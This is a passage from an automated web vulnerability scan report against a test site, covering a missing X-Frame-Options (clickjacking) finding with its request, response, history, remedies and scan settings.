The Issue was detected during the Scan. System 7/6/2020 6:49:13 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:11:33 PM

Remedy

Disable this method in all production systems. Even though the application is not vulnerable to cross-site scripting, a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

External References

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API7

17. Missing X-Frame-Options Header

LOW
1

Acunetix 360 detected a missing X-Frame-Options header which means that this website could be at risk of a clickjacking attack.

The X-Frame-Options HTTP header field indicates a policy that specifies whether the browser should render the transmitted resource within a frame or an iframe. Servers can declare this policy in the header of their HTTP responses to prevent clickjacking attacks, which ensures that their content is not embedded into other pages or frames.

Impact

Clickjacking is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on a framed page when they were intending to click on the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both.

Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

Vulnerabilities

17.1. http://php.testsparker.com/

Certainty



Go to the highlighted output

Request

GET / HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 751.1999
Total Bytes Received : 223
Body Length : 0
Is Compressed : No
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
Content-Length: 136
Content-Type: text/html
Date: Thu, 12 Nov 2020 07:51:19 GMT

<html>
<HEAD>
<SCRIPT language="JavaScript">
<!--
window.location="process.php?file=Generics/index.nsp";
//-->
</SCRIPT>
</HEAD>
</html>

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:51:28 AM
The Issue was detected during the Scan. System 8/19/2020 11:54:07 AM
The Issue was detected during the Scan. System 7/7/2020 9:51:37 AM
The Issue was detected during the Scan. System 7/6/2020 7:05:35 AM
The Issue was detected during the Scan. System 7/6/2020 6:47:50 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:10:14 PM

Remedy

  • Sending the proper X-Frame-Options in HTTP response headers that instruct the browser to not allow framing from other domains.
    • X-Frame-Options: DENY  It completely denies to be loaded in frame/iframe.
    • X-Frame-Options: SAMEORIGIN It allows only if the site which wants to load has a same origin.
    • X-Frame-Options: ALLOW-FROM URL It grants a specific URL to load itself in a iframe. However please pay attention to that, not all browsers support this.
  • Employing defensive code in the UI to ensure that the current frame is the most top level window.

External References

Remedy References

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API7
Enabled Security Checks : None
URL Rewrite Mode : Heuristic
Detected URL Rewrite Rule(s) : None
Excluded URL Patterns : (log|sign)\-?(out|off)
exit
endsession
gtm\.js
WebResource\.axd
ScriptResource\.axd
Authentication : Form Authentication
Authentication Profile :
Scheduled : No
Additional Website(s) :

None

Scan Profile : Default
Scan Policy : Default Security Checks
Report Policy : Default Report Policy
Scope : Entered Path and Below
Scan Type : Full
Max Scan Duration : 48 hour(s)